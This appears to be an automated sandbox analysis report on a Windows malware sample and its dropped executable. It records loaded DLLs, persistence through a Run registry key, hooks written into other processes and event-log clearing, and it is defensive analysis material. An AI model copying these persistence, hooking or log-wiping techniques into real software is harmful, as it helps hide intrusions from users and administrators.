                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: oledlg.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
                Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: d3d9.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: version.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: webio.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: d3d9.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: d3d9.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: dbgcore.dllJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{a07034fd-6caa-4954-ac3f-97a27216f98a}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
                Source: pXm5oVO3Go.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: pXm5oVO3Go.exeStatic file information: File size 3656704 > 1048576
                Source: pXm5oVO3Go.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x282200
                Source: pXm5oVO3Go.exeStatic PE information: More than 200 imports for USER32.dll
                Source: pXm5oVO3Go.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: pXm5oVO3Go.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: pXm5oVO3Go.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: pXm5oVO3Go.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: pXm5oVO3Go.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: pXm5oVO3Go.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: pXm5oVO3Go.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                Source: Binary string: \NewJumpLogin\ReleaseSW300exe\JumpLogin.pdb source: pXm5oVO3Go.exe
                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                Source: pXm5oVO3Go.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: pXm5oVO3Go.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: pXm5oVO3Go.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: pXm5oVO3Go.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: pXm5oVO3Go.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_006554E8 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006554E8
                Source: initial sampleStatic PE information: section where entry point is pointing to: .ubx1
                Source: DAPIjX8.exe.0.drStatic PE information: section name: .00cfg
                Source: DAPIjX8.exe.0.drStatic PE information: section name: .ubx0
                Source: DAPIjX8.exe.0.drStatic PE information: section name: .ubx1
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00641B27 push ecx; ret 0_2_00641B3A
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00641D65 push ecx; ret 0_2_00641D78
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_036542DA push ecx; ret 0_2_036542ED
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0364F4D9 push ecx; ret 0_2_0364F4EC
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_100142D6 push ecx; ret 0_2_100142E9
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_1000F4D5 push ecx; ret 0_2_1000F4E8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B7865 push ecx; ret 9_2_6C6B7878
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D73A8 push ecx; ret 9_2_6C6D7398
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D7399 push ecx; ret 9_2_6C6D7398
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03337616 push ecx; ret 9_2_03337629
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03337B2A push ecx; ret 9_2_03337B3D
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100395F2 push ecx; ret 9_2_10039605
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10039B06 push ecx; ret 9_2_10039B19
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B7865 push ecx; ret 10_2_6C6B7878
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D73A8 push ecx; ret 10_2_6C6D7398
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6D7399 push ecx; ret 10_2_6C6D7398
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeFile created: C:\Program Files (x86)\6fjdie\VCRUNTIME140.dllJump to dropped file
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeFile created: C:\Program Files (x86)\6fjdie\MSVCP140.dllJump to dropped file
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeFile created: C:\Program Files (x86)\6fjdie\libcef.dllJump to dropped file
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeFile created: C:\Program Files (x86)\6fjdie\DAPIjX8.exeJump to dropped file
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_004107D9 GetSystemMenu,AppendMenuW,AppendMenuW,SendMessageW,SendMessageW,SendMessageW,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,CreateFileW,CloseHandle,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetCommandLineW,CommandLineToArgvW,_wcschr,_wcschr,_wcschr,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,CreateSolidBrush,LoadLibraryW,GetProcAddress,FreeLibrary,0_2_004107D9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03328A82 StartServiceA,CloseServiceHandle,CloseServiceHandle,Sleep,lstrlen,LocalSize,lstrlen,LocalReAlloc,lstrlen,lstrlen,lstrlen,LocalFree,9_2_03328A82
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WINDOWSJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 5296 base: 1310005 value: E9 8B 2F 15 76 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 5296 base: 77462F90 value: E9 7A D0 EA 89 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 5296 base: 1320007 value: E9 EB DF 17 76 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 5296 base: 7749DFF0 value: E9 1E 20 E8 89 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 1984 base: 1240005 value: E9 8B 2F 22 76 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 1984 base: 77462F90 value: E9 7A D0 DD 89 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 1984 base: 1250007 value: E9 EB DF 24 76 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 1984 base: 7749DFF0 value: E9 1E 20 DB 89 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 2772 base: 2E00005 value: E9 8B 2F 66 74 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 2772 base: 77462F90 value: E9 7A D0 99 8B Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 2772 base: 2E10007 value: E9 EB DF 68 74 Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeMemory written: PID: 2772 base: 7749DFF0 value: E9 1E 20 97 8B Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03325C44 IsWindow,GetWindowThreadProcessId,GetCurrentProcessId,GetWindowTextA,IsWindowVisible,lstrlen,LocalAlloc,LocalSize,GetClassNameA,lstrlen,IsWindowEnabled,IsWindowVisible,IsIconic,IsZoomed,lstrcpy,LocalReAlloc,9_2_03325C44
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10027C20 IsWindow,GetWindowThreadProcessId,GetCurrentProcessId,GetWindowTextA,IsWindowVisible,lstrlen,LocalAlloc,LocalSize,GetClassNameA,lstrlen,IsWindowEnabled,IsWindowVisible,IsIconic,IsZoomed,lstrcpy,LocalReAlloc,9_2_10027C20
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10019A61 OpenEventLogW,ClearEventLogW,CloseEventLog,9_2_10019A61
